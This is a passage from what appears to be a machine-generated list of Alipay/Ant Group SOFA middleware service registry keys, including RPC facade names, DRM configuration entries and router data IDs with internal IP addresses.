=com.alipay.pointmng.common.service.integration.drm.BillDownloadResource.paymentWithRefundDetailSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.item.ItemManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.scardcenter.common.service.facade.OfflinepayCardModeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:singleDecreaseOrderProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.marketing.MarketingActivityServiceForRone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MAPITOOL#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirecenter.biz.service.prod.agreementpay.AgreementPayProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.company.facade.CompanyUiTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvItemCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.biz.manager.fingerprint.FingerPrintManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.runtime.CPUSpecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsearch.common.service.facade.api.tag.KbsearchTagCenterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.QueryWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:LINGKAI_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ugstrategycenter.common.service.facade.groupgrowth.GeneratedExchangeStrategyQueryFacade:1.0:gpExchangeStrategyQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_PREPAID#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_LINKS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openinsight.common.service.facade.search.api.SearchDistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.degradeRcp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.following.FollowingComponentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.gift.FlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.MobileService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.metadata.api.MetadataAtomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.query.InstCapitalConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsProjectProblemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.digitContent.NbsvUrlRecog:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.zmodel.core.variables.conf.ModelVariableResource.publishFunction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcloudfunds.service.facade.depository.api.OperateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.filebridge.service.facade.FileBridgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.open.facade.reply.OpenReplyUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.kmi.client.cache.refresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mdevsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.client.iotdeviceservice.DeviceInfoQueryNearClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.discount.DiscountQueryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.ctuUidBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.32.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.stocksupervise.common.service.facade.GrayControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:psslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.operation.OperRecruitPlanManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frscenter.common.service.facade.api.ScenarioPnlResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.activeinspect.facade.MiniAppConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocreative.common.service.facade.creativegroup.CreativeGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.drc.rm.endpoint.openapi.SubscriptionOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tdlib.common.manager.facade.ApdidQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.paymentmng.SHAREDATADataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileclientgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.FundBillQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainmessage.impl.FraudFeedBackWordingSwitchImpl.feedbackToggleJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.user.api.SecuInstitutionPublicAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antchaos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.wall.common.service.InsAccountPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.lottery.BackstageLotteryWinUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.ServicePointQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsLeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edubizsp.core.service.cache.TbaseRzoneCacheManagerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.shop.admin.ShopAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mpromocenter.operation.common.service.facade.api.label.LabelShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.biz.open.api.facade.ServicePurviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.MiniPromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.finnet.service.drm.FluxstrategyDrm3rdVersion.fluxStrategyPointSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.backend.api.BackendSuperSingleItemMarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.swiftauth.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.mng.IndustyrgwCommunicationConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.barcodeprod.common.service.facade.account.AccountCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.event.config.recoverStatusTaskTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.channel.spi.ChannelMobileAckCodeSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.management.card.CardMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.PhoneCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.redemptionFeeReminderSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditkit.facade.service.merchant.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ShopModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ExceptionInvestigationMetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:defincustomer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.externalpay.PcreditAssetDecreaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.PasswordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.ElasticModelFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zscale.api.ElasticCalcDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmonitormng.common.facade.commonmonitor.CommonMonitorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcRecoverAccidentalItemQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gffund_generalCallbackProcess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.ContentSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.35.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.posgw.common.service.facade.PosSerialService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.operation.MiniAppPermissionsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.DetectResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.query.ItemOutRelationQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.progov.service.api.ProductInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:airmngspecialcheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_bkmt_bkcd_isv_edit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.CrowdRuleDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.publicaccount.ContentPublicAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inspectprod.biz.service.schudeler.AppHealthCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appxagg@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.hyp.QueryTbaseValueByKeyForHYPFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprobe.common.service.facade.contractquality.api.flow.BaseFlow:1.0:fullLinkDirect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:accountprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundRequestMoneyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igadaptor.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.afts.common.service.facade.AlgorithmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.55.98.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipromofront.common.service.facade.service.rpc.LotteryPrizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-spcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.zcache.tbase.bankcardTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkmerchantprod.common.service.facade.trade.TradeMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsEmployeeAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.emergency.ability.facade.AssetOrderResourceEmergencyAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.CommonRefreshServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.isUseCoupon,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.feature.common.service.facade.sql.service.FeatureGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.accounttrans.api.AccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.201.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdda.facade.workflow.ProcessTemplateFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.auth_center.common.service.facade.res.ManagedResourceService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.197.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:excoreOrderExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.face.FaceConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_1_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.paycore.PmtCpBizTypeCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:csvoice_process_common_event@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.trade.prod.schedule.drm.SyncStatusIngOrderDRMResource.threadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.monitor.AlertTemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.GroovyScriptManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-rfmloancore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.xview.core.common.facade.CallbackService:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sofito_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.config.RopConfigService:1.0:ropcn-analyze-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.AppEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.po.AssetPoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.httpsDownloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acgotonecore.facade.service.GotoneServiceForInternalFacade:1.0:antchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.hotword.HotWordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ssdataprod.common.service.facade.ContentSecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dss.endpoint.dispatcher.StandaloneRequestDispatcher#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.refreshConfig,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instriskcenter.facade.api.InstRiskEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxiancore.common.service.InsPolicyBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.StabliltyConifgControlManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","twa.docker.app:1.0@insbffweb#@#DEFAULT_INSTANCE_ID#@#TWA","com.alipay.mfinquotationprod.common.service.facade.api.BarometerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcalbmng.facade.fssu.FssuInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antmembermng.common.service.dataoperation.component.BizAppSaveDataOperateService:1.0:rtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmemberprod.common.service.facade.api.tr.task.KbTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.apply.LendApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.196.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.common.service.facade.user.MobileUserInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.CreativeServiceStressTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.spi.ActivityQueryServiceCallback:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.client.serivce.ExterfaceInvokeService:1.0:inshealthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.AuthSpi:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.GrsltProjectBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@channelspweb#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.inspectprod.biz.service.schudeler.StatsRuleAppExecutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.gcard.GCardFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CommonGreyResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.glibra.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.irlab.facade.SelfCureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrmcore.common.service.facade.service.model.monitor.MdpWarnRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.CategoryService:1.0:categoryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.UnitradeprodJsonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nfcc.common.service.facade.agna.OriginUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CreditToolQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcserviceop.dispute.service.facade.DisputeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:csmobilebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.indicator.IndicatorCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.TraitGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.SpreadUrlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:gsmartcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SO